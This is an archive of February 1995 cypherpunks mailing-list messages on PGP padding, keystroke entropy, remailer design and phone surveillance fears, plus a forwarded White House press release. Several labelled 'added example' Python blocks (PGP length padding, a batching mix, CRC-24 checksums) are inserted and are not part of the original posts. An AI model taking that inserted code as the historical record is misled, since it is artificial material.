In-Reply-To: <199502022357.SAA28764@bb.hks.net>
Message-ID: <95Feb2.210355edt.6007@cannon.ecf.toronto.edu>
MIME-Version: 1.0
Content-Type: text/plain


>    We have potential bugging devices in all our houses - The telephone!
> Of course, when it is onhook, the microphone does not transmit... or
> does it? Would the phone have to be rewired to render it always
> "offhook" or would it be an operation at the central phone company?
> If the present models would have to be rewired, then how about future
> models? Much function is done thru chips & so could many of the models
> on the current market be remote programmable? See the latest issue of
> Mondo 2000.

The Mondo article ("Total Surveillance" by Charles Ostman) was a joke.
Among other things, he claims the Teledesic project is a massive
satellite surveillance scheme.  Those birds are going to be in
geo-synchronous orbit!  What's more, even a LEO spy-sat weighs many
tons.  Nobody could launch 840 satellites of that weight without being
noticed.

From the inaccuracies in what I do know about, I assume all of the
phone-paranoia is also unjustified.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robert Rothenburg Walking-Owl <rrothenb@ic.sunysb.edu>
Date: Thu, 2 Feb 95 18:12:33 PST
To: cypherpunks@toad.com
Subject: The FNORDWALL CHIP.
Message-ID: <199502030212.VAA22129@libws2.ic.sunysb.edu>
MIME-Version: 1.0
Content-Type: text/plain



>    ----- Transcript of session follows -----
> ... while talking to toad.com.:
> >>> RCPT To:<cyberpunks@toad.com>
> <<< 550 <cyberpunks@toad.com>... User unknown
> 550 <cyberpunks@toad.com>... User unknown

Talk about lame. I accidentally CC'd this to "cyberpunks". *sigh*

[ More header snipped! ]

> 
> > 
> >          THE FIREWALL CHIP!  U'RE PHONE ALWAYS OFFHOOK?
> 
> Fnorjd!
> 
> > 
> >    We have potential bugging devices in all our houses - The telephone!
> > Of course, when it is onhook, the microphone does not transmit... or
> > does it? Would the phone have to be rewired to render it always
> > "offhook" or would it be an operation at the central phone company?
> 
> I believe there is a way to get regular analog phones to go "off hook"
> by sending the right kind of signal down the wire. Apparently not that
> reliable if you've got multiple extensions.  I think some newer phone
> systems and/or newer phones don't work that well for the method, though
> I never tried it myself.
> 
> 
> >    This problem demands a hardware solution. How about an adapter module
> > between microphone & the rest of phone?
> 
> How about disconnecting the phone when unneeded? Or, filter the calls through
> an answering machine (which may also defeat such a method described above).
> 
> [ Snip! ]
> > 
> >    The FIREWALL CHIP could have its applications software supplied by
> > various companies which would specialize in fields for
> > detecting electronic intrusion. Some specializing in phone audio, others
> > in vision telephones, cell phone tracking, & many others to be
> > considered.
> > 
> >    The FIREWALL CHIP will be a future necessity. It & its software
> > suppliers will probably constitute an outlaw industry.
> 
> I don't think it will be a necessity. I can think of several alternatives
> that don't require trusting an "outlaw industry".
> 
> Rob
> 
> 
> --VAA00527.791777197/abel.ic.sunysb.edu--
> 
> 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Hal <hfinney@shell.portal.com>
Date: Thu, 2 Feb 95 21:15:55 PST
To: cypherpunks@toad.com
Subject: Re: Adding padding to PGP files
Message-ID: <199502030514.VAA24599@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


From: Nobody@eniac.ac.siue.edu (Anonymous)
> > Date: Thu, 2 Feb 1995 08:48:49 -0800
> > From: Hal <hfinney@shell.portal.com>
> > 
> > It only works on binary ".pgp" public-key encrypted files (not ascii armored
> > files).  So there would be some work needed to make it a really useful tool.
> > 
> > Hal
> 
>   I just tried adding random characters at the end of a pgp ascii
> armoured message.  I had to cut out the checksum, but pgp was able to
> decrypt the message just fine.  So a very simple program (ideally with
> a strong source of random numbers) should be able to pad ascii
> armoured files.

Unfortunately, this approach is easy but doesn't really succeed in adding
undetectable padding.  The PGP message, once the ascii armor is stripped
away, has a byte count in it.  Anyone can de-armor the message and see
that this byte count does not match the size of the file.  So you also
need to bump this byte count to match the added bytes.  That's all my
perl script does that I posted.

Hal
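
An added example, not Hal's perl script (which does not appear in this
message): it de-armors a message, walks the old-format PGP packet headers,
reports bytes left over after the last declared length, and then rewrites that
length so the count matches the file size, which is the step Hal describes.
The packet bodies are constructed placeholder bytes rather than real
ciphertext, and all function names are assumptions.

```python
import base64

# Old-format packet header (PGP 2.x, RFC 1991; kept in RFC 4880):
#   bit 7 = 1, bit 6 = 0, bits 5-2 = packet tag, bits 1-0 = length type.
LENGTH_OCTETS = {0: 1, 1: 2, 2: 4}    # length type 3 = indeterminate (runs to EOF)


def dearmor(text):
    """Return the binary message inside an ASCII-armored block."""
    lines = [l.strip() for l in text.strip().splitlines()]
    start = next(i for i, l in enumerate(lines) if l.startswith("-----BEGIN PGP"))
    end = next(i for i, l in enumerate(lines) if l.startswith("-----END PGP"))
    body = lines[start + 1:end]
    if "" in body:                     # armor headers end at the first blank line
        body = body[body.index("") + 1:]
    # A line starting with '=' is the CRC-24 checksum, not message data.
    return base64.b64decode("".join(l for l in body if not l.startswith("=")))


def walk_packets(data):
    """Return ([(tag, header_len, body_len), ...], offset after the last packet)."""
    packets, pos = [], 0
    while pos < len(data):
        ctb = data[pos]
        if ctb & 0xC0 != 0x80:         # not an old-format packet header: stop
            break
        tag, ltype = (ctb >> 2) & 0x0F, ctb & 0x03
        if ltype == 3:                 # indeterminate length swallows the rest
            packets.append((tag, 1, len(data) - pos - 1))
            return packets, len(data)
        n = LENGTH_OCTETS[ltype]
        if pos + 1 + n > len(data):    # truncated header
            break
        body_len = int.from_bytes(data[pos + 1:pos + 1 + n], "big")
        if pos + 1 + n + body_len > len(data):   # declared length overruns file
            break
        packets.append((tag, 1 + n, body_len))
        pos += 1 + n + body_len
    return packets, pos


def trailing_bytes(data):
    """Bytes present in the file but not covered by any packet's byte count."""
    return len(data) - walk_packets(data)[1]


def bump_last_length(data):
    """Fold trailing bytes into the last packet by rewriting its length field."""
    packets, end = walk_packets(data)
    extra = len(data) - end
    if not packets or extra == 0:
        return data
    _, hdr_len, body_len = packets[-1]
    start, n = end - hdr_len - body_len, hdr_len - 1
    new_len = body_len + extra
    if new_len >= 1 << (8 * n):
        raise ValueError("length field too small for the padded size")
    return data[:start + 1] + new_len.to_bytes(n, "big") + data[start + 1 + n:]


def make_packet(tag, body, ltype):
    """Build an old-format packet (used only for the constructed sample)."""
    n = LENGTH_OCTETS[ltype]
    return bytes([0x80 | (tag << 2) | ltype]) + len(body).to_bytes(n, "big") + body


def armor(data):
    """Minimal armor without a checksum line, as in the quoted experiment."""
    b64 = base64.b64encode(data).decode()
    rows = [b64[i:i + 64] for i in range(0, len(b64), 64)]
    return "\n".join(["-----BEGIN PGP MESSAGE-----", "Version: 2.6.2", ""]
                     + rows + ["-----END PGP MESSAGE-----"])


# Constructed sample: tag 1 (public-key encrypted session key) followed by
# tag 9 (conventionally encrypted data), both with placeholder bodies.
SAMPLE = make_packet(1, b"\xAA" * 140, 1) + make_packet(9, b"\xBB" * 300, 2)
PADDING = b"\x00" + b"\x5A" * 63       # constructed 64 bytes of appended padding

if __name__ == "__main__":
    padded = dearmor(armor(SAMPLE + PADDING))
    print("trailing bytes after naive padding:", trailing_bytes(padded))
    print("trailing bytes after length bump:  ",
          trailing_bytes(bump_last_length(padded)))
```

Padding whose first byte happens to look like an old-format header (0x80 to
0xBF) can be misread as one more packet, so a production check would also
restrict which tags it accepts.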




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robert Rothenburg Walking-Owl <rrothenb@ic.sunysb.edu>
Date: Thu, 2 Feb 95 18:26:52 PST
To: Nobody@eniac.ac.siue.edu
Subject: Re: How much entropy in a key press?
In-Reply-To: <199502021456.IAA01951@eniac.ac.siue.edu>
Message-ID: <199502030226.VAA22341@libws2.ic.sunysb.edu>
MIME-Version: 1.0
Content-Type: text/plain


> 
> Can anyone tell me how many bits of entropy there are per 7-bit ASCII
> character.  More specifically, a program wishes to generate a session
> key by prompting the user to type N random key presses.  The characters
> entered are hashed down to 128 bits by MD5 for subsequent use as a key.

Depends. You could use a fast timer and sample between keystrokes, then
use the least significant byte of the difference like PGP does (for DOS,
anyway).  You could change that so it samples bits instead of bytes,
but it's conceivable that you'll have less randomness that way.

I've experimented with speeding up the timer IRQs on my PC for that but
found it was superficially less random (in a pool of 256 bytes there
were more duplicates).

> What should the value of N be, such that the entropy of the user's
> string does not unnecessarily exceed the entropy of the hash?

With a decent timer that samples bytes, I'd say 16 keystrokes. Use
a cypher over the random data to garble it a bit.

Rob

> 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robert Rothenburg Walking-Owl <rrothenb@ic.sunysb.edu>
Date: Thu, 2 Feb 95 18:36:54 PST
To: nobody@myriad.pc.cc.cmu.edu (Anonymous) (Anonymous)
Subject: Re: Remailer Unreliability
In-Reply-To: <m0raAVp-000vl1C@myriad.pc.cc.cmu.edu>
Message-ID: <199502030236.VAA22498@libws2.ic.sunysb.edu>
MIME-Version: 1.0
Content-Type: text/plain


> 
> What if it was possible to specify an alternate remailer?  In the case that
> a remailer went down, you could specify an alternate.  For example:
> 
[ Snip! ]
> 
> If foo.com was down, the message would be delivered to bar.com instead.
> The PGP message would have to be readable to both of them, so it would
> decrease security, but reliability would be better, especially for
> reply blocks.  Comments?
> 
Hmmm. Not as secure, but how about this... (a kind of script)

begin A
  if active(mailer@foo.com) mail(mailer@foo.com,B,C)
  elseif active(mailer@bar.com) mail(mailer@bar.com,B,C)
end

begin B
 { next block of scripts for chain... remailer would encrypt B and C
 blocks for appropriate mailer }
end

begin C
 { this block would be cargo... could even contain multiple messages? }
end

That's a pseudoscript, but you get the idea... (no pun intended ;)






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jordyn@alinc.com (Jordyn A Buchanan)
Date: Thu, 2 Feb 95 21:11:34 PST
To: cypherpunks@toad.com
Subject: Re: Remailer Unreliability
Message-ID: <ab57699300021004facc@[204.99.128.203]>
MIME-Version: 1.0
Content-Type: text/plain


>> Date: Thu, 2 Feb 95 18:00 EST
>> From: nobody@myriad.pc.cc.cmu.edu (Anonymous)
>>
>> What if it was possible to specify an alternate remailer?  In the case that
>> a remailer went down, you could specify an alternate.  For example:
>
>  Well, *I* think it is a good idea.  But how does remailer1 know that
>remailer2 is both a remailer and down?

The issue of whether or not the alternate address is a remailer seems to
be largely irrelevant.  It doesn't really hurt anyone to be able to specify
an alternate address, and the feature would even seem to have some practical
value as you could specify alternate addresses for an end-recipient if
you suspect an address might be unreliable.

As long as the alternate address is only invoked if the first mail delivery
fails, the problem of the exponentially-growing message is avoided as well.

Jordyn

-------------------------------------------------------------------------
Jordyn A. Buchanan                      Environmental Studies (B.U.S.)
jordyn@alinc.com                        University of Utah -- '95 (hope)

PGP Public Key: 0xADEEC1 ED 3D 36 5A 98 CE 9D B4  4B 37 0B 9B B5 D6 F3 4B






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jordyn@alinc.com (Jordyn A Buchanan)
Date: Thu, 2 Feb 95 21:16:56 PST
To: cypherpunks@toad.com
Subject: Re: Remailer Unreliability
Message-ID: <ab576c25020210049573@[204.99.128.201]>
MIME-Version: 1.0
Content-Type: text/plain


>> Date: Thu, 2 Feb 95 18:00 EST
>> From: nobody@myriad.pc.cc.cmu.edu (Anonymous)
>>
>> What if it was possible to specify an alternate remailer?  In the case that
>> a remailer went down, you could specify an alternate.  For example:
>
>  Well, *I* think it is a good idea.  But how does remailer1 know that
>remailer2 is both a remailer and down?

The issue of whether or not the alternate address is a remailer seems to
be largely irrelevant.  It doesn't really hurt anyone to be able to specify
an alternate address, and the feature would even seem to have some practical
value as you could specify alternate addresses for an end-recipient if
you suspect an address might be unreliable.

As long as the alternate address is only invoked if the first mail delivery
fails, the problem of the exponentially-growing message is avoided as well.

Jordyn

-------------------------------------------------------------------------
Jordyn A. Buchanan                      Environmental Studies (B.U.S.)
jordyn@alinc.com                        University of Utah -- '95 (hope)

PGP Public Key: 0xADEEC1 ED 3D 36 5A 98 CE 9D B4  4B 37 0B 9B B5 D6 F3 4B






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Nobody@eniac.ac.siue.edu (Anonymous)
Date: Thu, 2 Feb 95 20:47:02 PST
To: cypherpunks@toad.com
Subject: Re: Adding padding to PGP files
In-Reply-To: <199502021648.IAA05417@jobe.shell.portal.com>
Message-ID: <199502030438.WAA09561@eniac.ac.siue.edu>
MIME-Version: 1.0
Content-Type: text/plain


> Date: Thu, 2 Feb 1995 08:48:49 -0800
> From: Hal <hfinney@shell.portal.com>
> 
> It only works on binary ".pgp" public-key encrypted files (not ascii armored
> files).  So there would be some work needed to make it a really useful tool.
> 
> Hal

  I just tried adding random characters at the end of a pgp ascii
armoured message.  I had to cut out the checksum, but pgp was able to
decrypt the message just fine.  So a very simple program (ideally with
a strong source of random numbers) should be able to pad ascii
armoured files.

  Noyb




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anthony Ortenzi <ortenzi@interactive.net>
Date: Thu, 2 Feb 95 20:16:54 PST
To: cypherpunks@toad.com
Subject: 1995-02-02 President Names Members to Intelligence Commission (fwd)
Message-ID: <Pine.BSI.3.91.950202231722.8718A-100000@ns.interactive.net>
MIME-Version: 1.0
Content-Type: text/plain


[Thought Intelligence would be something of interest to the list... ]
[Note the sneaking in of Zoe Baird (umm... can you say favor?)      ]
[...................................................................]

---------- Forwarded message ----------
Date: Thu, 2 Feb 1995 18:53-0500
From: The White House <Publications-Admin@WhiteHouse.Gov>
To: Public-Distribution@CLINTON.AI.MIT.EDU
Subject: 1995-02-02 President Names Members to Intelligence Commission




                            THE WHITE HOUSE

                     Office of the Press Secretary

________________________________________________________________________
For Immediate Release					February 2, 1995


      STATEMENT BY THE PRESIDENT NAMING MEMBERS OF THE COMMISSION
    ON THE ROLES AND CAPABILITIES OF THE U.S. INTELLIGENCE COMMUNITY


     I am announcing today appointments to the Congressionally-mandated
Commission on the Roles and Capabilities of the United States
Intelligence Community.  The Commission will be chaired by the current
chairman of my Foreign Intelligence Advisory Board, Les Aspin.  Former
Senator Warren Rudman will serve as the vice chairman and I have asked
General Lew Allen, Jr., Zoe Baird, Ann Caracristi, Stephen Friedman,
Anthony S. Harrington, Robert J. Hermann, and Ambassador Paul Wolfowitz
to serve as well.

     These distinguished Americans will join the eight members appointed
by the leadership of the 103rd Congress.  They are Tony Coelho, David
Dewhurst, Representative Norm Dicks, Senator James Exon, former Senator
Wyche Fowler, Representative Porter Goss, General Robert Pursley and
Senator John Warner.

     Intelligence remains a critical element of our national power and
influence.  For over 40 years bipartisan support for the work performed
by U.S.  intelligence has been essential to the creation of an
intelligence capability that is second to none.  While the world has
changed in dramatic ways, our need to retain the advantage that U.S.
intelligence provides our country remains constant.

     With the end of the Cold War we must renew and reinvigorate this
bipartisan support.  The foundation for this support must begin with a
thorough assessment of the kind of intelligence community we will need
to address the security challenges of the future.  Our objective is to
strengthen U.S. intelligence, to ensure it has the management, skills
and resources needed to successfully pursue our national security
interests through the next decade and beyond.  It is an effort to which
I attach the highest personal priority.

     I am confident that Les Aspin, Warren Rudman and the other
outstanding members of this Commission will work cooperatively with the
leadership of the intelligence community and the Congress to ensure
continued bipartisan support for this critical mission.  And I know that
their effort will ensure the continued trust of the American people in
the outstanding and often unheralded work performed by the men and women
of U.S. intelligence.

# # #

Attachment:
     Biographic Information





	      THE COMMISSION ON THE ROLES AND CAPABILITIES
	      OF THE UNITED STATES INTELLIGENCE COMMUNITY
                            
                            

		   Members Appointed by the President 


Honorable Les Aspin, Chairman.  Mr. Aspin, of Milwaukee, Wisconsin, is a
Distinguished Professor of International Policy at Marquette University
and a Counsel at the Center for Strategic and International Studies.  He
served as Secretary of Defense from 1993 to 1994.  As the US
Representative from Wisconsin's 1st District, his congressional career
spanned twenty two years.  He was Chairman of the House Armed Services
Committee from 1985 to 1993.  Prior to his election to the US Congress
in 1970, Mr. Aspin was a staff assistant to the chairman of President
Kennedy's Council of Economic Advisors.  He also serves as Chairman of
the President's Foreign Intelligence Advisory Board (PFIAB).
  
Warren B. Rudman, Vice Chairman.  Senator Rudman, of Washington, DC and
Manchester, New Hampshire, is a partner in the Washington law firm of
Paul, Weiss, Rifkind, Wharton & Garrison.  He served as a U.S.
Senator from 1980 to 1992, where he was a member of the Select
Committee on Intelligence.  He previously was Attorney General of the
State of New Hampshire.  He also serves as Vice Chairman of the PFIAB.

General Lew Allen, Jr., USAF (Ret.).  General Allen, of Pasadena,
California, served as Chief of Staff of the Air Force and Director of
the National Security Agency.  He retired in 1991 as a Vice President
of the California Institute of Technology and Director of the Jet
Propulsion Laboratory.  He was a member of President Bush's PFIAB and
is a current PFIAB member.

Zoe Baird.  Ms. Baird, of Hartford, Connecticut, is Senior Vice
President and General Counsel of the Aetna Life & Casualty company.
She is a former counselor and senior staff executive of the General
Electric Corporation, a former partner in the Washington, DC law firm
of O'Melveny & Myers, and a former Associate Counsel to President
Carter.

Ann Caracristi.  Miss Caracristi, of Washington, DC, is a former Deputy
Director of the National Security Agency, where she served in a variety
of senior management positions over a 40 year career.  She recently
chaired a DCI Task Force on intelligence training and is a member of
the DCI/Secretary of Defense Joint Security Commission.  She is a
current PFIAB member.

Stephen Friedman.  Mr. Friedman, of New York City, is Senior Chairman
and Limited Partner of Goldman, Sachs & Co., which he originally joined
in 1966.  He served as Chairman and Senior Partner from December 1992
to November 1994 when he retired from active management of the firm.

Anthony S. Harrington.  Mr. Harrington, of Washington, DC, is a partner
in the law firm of Hogan & Hartson.  He is a former General Counsel to
the Democratic National Committee, the former General Counsel to the
Clinton/Gore Campaign, a founding Director of the Center for Democracy,
and a former Assistant Dean of the Duke Law School.   He is a current
PFIAB member.

Robert J. Hermann.  Dr. Hermann, of Hartford, Connecticut, is the
Senior Vice President for Science and Technology of the United
Technologies Corporation.  He is a former Director of the Defense
Department's National Reconnaissance Office and a former senior
official at the National Security Agency.  He is a current PFIAB
member.

Paul D. Wolfowitz.  Dr. Wolfowitz, of Chevy Chase, Maryland, is the
dean of the Paul H. Nitze School of Advanced International Studies at
The Johns Hopkins University.  He served as Under Secretary of Defense
for Policy from 1989 to 1993 and has held a variety of positions in
government beginning in 1966.


             Members Appointed By Congress

Honorable Tony Coelho.  Mr. Coelho is President and CEO of Wertheim
Schroder Investment Services, Incorporated, and a Managing Director of
Wertheim Schroder & Co, Inc.  He is a former US Representative from
California and a former Majority Whip of the US House of
Representatives.

David H. Dewhurst.  Mr. Dewhurst is Founder, Chairman, and CEO of
Falcon Seaboard Resources, Inc., a Houston-based, integrated energy
company.  He served as a Case Officer with the Central Intelligence
Agency in the early 1970s, and was recently elected to the National
Board of Directors of the Jewish Institute for National Security
Affairs.  Mr. Dewhurst served as Chairman of the Texas Product
Development Advisory Board.

Representative Norman D. Dicks.  Mr. Dicks, of Washington, was first
elected to the House in 1976.  He has served on the Appropriations
Committee since his freshman term, and currently sits on three
subcommittees -- Defense, Interior and Military Construction. He
currently is the ranking minority member of the Select Committee on
Intelligence.  Mr.  Dicks also was an Administrative Assistant to
Senator Warren Magnuson from 1973 to 1976.

Senator J. James Exon.   Senator Exon, of Nebraska, was elected to his
first term in 1978.  He currently is a member of the Armed Services
Committee (where he chairs the Subcommittee on Nuclear Deterrence, Arms
Control & Defense Intelligence), the Committee on Commerce, Science &
Technology and the Budget Committee.  He is a former two-term Governor
of Nebraska, and a World War Two veteran of the US Army Signal Corps.

Honorable Wyche Fowler.  Mr. Fowler is a partner in the law firm of
Powell, Goldstein, Frazer & Murphy.  He served 16 years in the US
Congress.  Elected to the Senate in 1986, he was Assistant Floor Leader
and was a member of the Appropriations, Budget, Energy and
Agricultural Committees.  During his nine years in the House, he served
on the Select Committee on Intelligence and the Foreign Relations and
Ways and Means Committees.

Representative Porter J. Goss.  Mr. Goss, of Florida, was first elected
to the House in 1988.  He currently is a member of the Select Committee
on Intelligence, the Ethics Committee and the Rules Committee, where he
chairs the Subcommittee on the Legislative Process.  He is a former
Clandestine Service Officer with the Central Intelligence Agency, where
he served for ten years.  Mr. Goss is a former Councilman of Sanibel,
Florida, where he also was elected the city's first mayor.

Lt. Gen. Robert E. Pursley, USAF (Ret.)  General Pursley is President
of the Logistics Management Institute, and a former Vice Chairman of
USAA, a private financial service company, and a former Executive Vice
President of Insilco Corporation.  In twenty five years of military
service, he served as Military Assistant to Secretaries of Defense
Laird, Clifford and McNamara, and was Commander of US Forces Japan and
the Fifth Air Force.

Senator John Warner.  Senator Warner, of Virginia, was elected to his
seat in 1978.  He is the second most senior member of the Senate Armed
Services Committee and the Environment and Public Works Committee.  He
served as Vice Chairman of the Senate Select Committee on Intelligence
from 1992 to 1994.  He also is a former Secretary and Undersecretary of
the Navy.  Senator Warner sponsored the legislation creating this
commission.


# # #








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jon Lasser <jlasser@rwd.goucher.edu>
Date: Thu, 2 Feb 95 22:31:34 PST
To: cypherpunks@toad.com
Subject: A simple idea
Message-ID: <Pine.SUN.3.91.950203012421.8112A-100000@rwd.goucher.edu>
MIME-Version: 1.0
Content-Type: text/plain



Maybe this has been discussed before, but if so I wasn't around for it 
and would like to know:

What if: (assuming trusted remailers, but still worried about traffic 
analysis of those remailers):

One mailed a message to one remailer. This remailer held onto all 
messages until some predestined hour or kilobyte size or whatever, and 
then forwarded ALL its messages to this other remailer, in one packet 
(.TARred and PGPed separately, say), but NOT IN THE ORDER RECEIVED?

While this wouldn't solve all the problems (to some extent, the sizes of 
files might be correlated, but this could probably be foiled by other 
means), wouldn't it at least foil the easy to/from traffic analysis that 
is (I believe) the greatest threat?

Jon
==============================================================================
                     Jon Lasser <jlasser@goucher.edu>
This is an advanced .signature virus -- please attach to your .signature and
add your last initial to the list: l
------------------------------------------------------------------------------
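[Added example, not part of the original post: a sketch of the hold-then-reorder remailer proposed above. The class name, the count threshold and the 4-byte length prefix are assumptions of this example. Padding every message to one cell size is this example's answer to the size correlation the post mentions, and it assumes the batch is encrypted to the next hop before it leaves.]

```python
import secrets

class BatchingMix:
    """Hold messages until `threshold` have arrived, then release them all at
    once, each padded to `cell_size` bytes, in an order unrelated to arrival."""

    def __init__(self, threshold, cell_size):
        self.threshold = threshold
        self.cell_size = cell_size
        self.pool = []

    def accept(self, payload):
        """Queue one message. Returns the shuffled batch when the pool fills,
        otherwise None (nothing leaves the remailer yet)."""
        room = self.cell_size - 4
        if len(payload) > room:
            raise ValueError("payload does not fit in one cell")
        # 4-byte length, the payload, then random fill up to the cell size.
        cell = (len(payload).to_bytes(4, "big") + payload
                + secrets.token_bytes(room - len(payload)))
        self.pool.append(cell)
        return self.flush() if len(self.pool) >= self.threshold else None

    def flush(self):
        """Release whatever is pooled. Also the hook for a timed release."""
        batch, self.pool = self.pool, []
        # OS-backed randomness: a predictable shuffle would let an observer
        # who knows the arrival order reconstruct the mapping.
        secrets.SystemRandom().shuffle(batch)
        return batch

def unpad(cell):
    """Recover the payload from a cell at the receiving remailer."""
    length = int.from_bytes(cell[:4], "big")
    return cell[4:4 + length]

if __name__ == "__main__":
    mix = BatchingMix(threshold=3, cell_size=64)
    for text in (b"first", b"second message", b"3"):   # constructed inputs
        out = mix.accept(text)
    print([unpad(c) for c in out], {len(c) for c in out})
```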





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ben <samman@CS.YALE.EDU>
Date: Thu, 2 Feb 95 23:01:25 PST
To: Gary Jeffers <CCGARY@MIZZOU1.missouri.edu>
Subject: Re: The FIREWALL CHIP. U're phone always offhook?
In-Reply-To: <199502022357.SAA28764@bb.hks.net>
Message-ID: <Pine.SUN.3.91.950203015859.20431A-100000@jaguar.zoo.cs.yale.edu>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 2 Feb 1995, Gary Jeffers wrote:

> -----BEGIN PGP SIGNED MESSAGE-----
> 
>          THE FIREWALL CHIP!  U'RE PHONE ALWAYS OFFHOOK?
> 
>    We have potential bugging devices in all our houses - The telephone!
> Of course, when it is onhook, the microphone does not transmit... or
> does it? Would the phone have to be rewired to render it always
> "offhook" or would it be an operation at the central phone company?
> If the present models would have to be rewired, then how about future
> models? Much function is done thru chips & so could many of the models
> on the current market be remote programmable? See the latest issue of
> Mondo 2000.

Use an encrypted cordless phone.  When it's not in use, take the battery 
out of the phone.  As long as the model you own doesn't have a speaker 
phone you're cool.

If you start thinking that all phones that you buy have other hidden 
mikes in them, then I start wondering about paranoia.

Ben.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robert Rothenburg Walking-Owl <rrothenb@ic.sunysb.edu>
Date: Fri, 3 Feb 95 00:20:26 PST
To: Nobody@eniac.ac.siue.edu (Anonymous)
Subject: Re: Adding padding to PGP files
In-Reply-To: <199502030438.WAA09561@eniac.ac.siue.edu>
Message-ID: <199502030820.DAA07843@libws4.ic.sunysb.edu>
MIME-Version: 1.0
Content-Type: text/plain


> 
> > Date: Thu, 2 Feb 1995 08:48:49 -0800
> > From: Hal <hfinney@shell.portal.com>
> > 
> > It only works on binary ".pgp" public-key encrypted files (not ascii armored
> > files).  So there would be some work needed to make it a really useful tool.
> > 
> > Hal
> 
>   I just tried adding random characters at the end of a pgp ascii
> armoured message.  I had to cut out the checksum, but pgp was able to
> decrypt the message just fine.  So a very simple program (ideally with
> a strong source of random numbers) should be able to pad ascii
> armoured files.

Probably can calculate a new checksum too... or binary PGP, add junk
and mime/uu/xx-encode....?

Rob
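[Added example, not part of the original post: recomputing the armor checksum after bytes are appended. It uses the CRC-24 that PGP armor carries on its "=XXXX" line; the sample data and helper names are constructed for this example. It only repairs the armor layer, not the byte count inside the message that Hal describes.]

```python
import base64

CRC24_INIT = 0xB704CE
CRC24_POLY = 0x1864CFB   # 0x864CFB with the bit-24 carry included

def crc24(data):
    """CRC-24 as used for the checksum line of PGP ASCII armor."""
    crc = CRC24_INIT
    for byte in data:
        crc ^= byte << 16
        for _ in range(8):
            crc <<= 1
            if crc & 0x1000000:
                crc ^= CRC24_POLY
    return crc & 0xFFFFFF

def checksum_line(data):
    """The '=' line: three CRC bytes, big-endian, base64-encoded."""
    return "=" + base64.b64encode(crc24(data).to_bytes(3, "big")).decode("ascii")

def armor(data, crc_line="auto"):
    """Wrap binary data. crc_line: "auto" computes the checksum, None leaves
    the line out, any other string is written as given."""
    b64 = base64.b64encode(data).decode("ascii")
    lines = ["-----BEGIN PGP MESSAGE-----", ""]
    lines += [b64[i:i + 64] for i in range(0, len(b64), 64)]
    if crc_line == "auto":
        crc_line = checksum_line(data)
    if crc_line is not None:
        lines.append(crc_line)
    lines.append("-----END PGP MESSAGE-----")
    return "\n".join(lines) + "\n"

def dearmor(text):
    """Return (data, crc_ok); crc_ok is None when no checksum line is present."""
    lines = [line.strip() for line in text.splitlines()]
    begin = next(i for i, l in enumerate(lines) if l.startswith("-----BEGIN "))
    end = next(i for i, l in enumerate(lines) if l.startswith("-----END "))
    body = lines[begin + 1:end]
    if "" in body:                       # armor headers end at the blank line
        body = body[body.index("") + 1:]
    stated = None
    if body and len(body[-1]) == 5 and body[-1].startswith("="):
        stated = int.from_bytes(base64.b64decode(body[-1][1:]), "big")
        body = body[:-1]
    data = base64.b64decode("".join(body))
    return data, (None if stated is None else stated == crc24(data))

def repad(text, junk):
    """De-armor, append junk, re-armor with a freshly computed checksum."""
    data, _ = dearmor(text)
    return armor(data + junk)

SAMPLE = bytes(range(100))   # constructed stand-in for a binary .pgp file
JUNK = b"\xa5" * 20          # constructed; real padding would be random bytes

if __name__ == "__main__":
    stale = armor(SAMPLE + JUNK, crc_line=checksum_line(SAMPLE))
    print("old checksum kept :", dearmor(stale)[1])
    print("checksum cut out  :", dearmor(armor(SAMPLE + JUNK, crc_line=None))[1])
    print("checksum redone   :", dearmor(repad(armor(SAMPLE), JUNK))[1])
```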




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@tower.techwood.org (Anonymous)
Date: Fri, 3 Feb 95 07:16:12 PST
To: cypherpunks@toad.com
Subject: Re: Why encrypt intra-remailernet.
In-Reply-To: <Pine.3.89.9502022036.D23979-0100000@vern.bga.com>
Message-ID: <199502031504.HAA15462@tower.techwood.org>
MIME-Version: 1.0
Content-Type: text/plain


Nathan Zook <nzook@bga.com> wrote:
> Was this Detweiller's "exponentially growing message"?

Yes.

> Note that requiring pgp wrappers kills this...

No, just encrypt to multiple recipients.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Brett Turcotte" <turcotte@io.com>
Date: Fri, 3 Feb 95 10:02:45 PST
To: cypherpunks@toad.com
Subject: Re: 1995-02-02 President Names Members to Intelligence Commissi
Message-ID: <199502031802.MAA20515@pentagon.io.com>
MIME-Version: 1.0
Content-Type: text/plain


<much snippage of press release naming commission members>
> 
> Attachment:
>      Biographic Information
> 
> 
> 
> 
> 
> 	      THE COMMISSION ON THE ROLES AND CAPABILITIES
> 	      OF THE UNITED STATES INTELLIGENCE COMMUNITY
>                             
<more snippage of bio information>

Anyone else notice all of the inside the beltway plus NYC area types 
on this list....anyone want to bet on how much "newly required" 
intelligence capabilities will come out of this commission...

Brett Turcotte
turcotte@io.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jltocher@CCGATE.HAC.COM
Date: Fri, 3 Feb 95 09:12:52 PST
To: Cypherpunks@toad.com
Subject: No Subject
Message-ID: <9501037918.AA791831560@CCGATE.HAC.COM>
MIME-Version: 1.0
Content-Type: text/plain


     From Edupage:
     
     THE NEW ETHOS OF THE NET
     A professor at St. Cloud University in Minnesota calls for overhauling 
     business school curricula to stress ethical concerns in the electronic 
     age the same way they stress finance or economic theory. The end 
     result? "Information systems will be protected because most people 
     will no longer be willing to purposefully contaminate a program or 
     network; they will protect others' confidentiality, privacy, and 
     copyright as they protect their own; they will refuse to plagiarize, 
     fabricate, and perpetrate other types of fraud; and they will not 
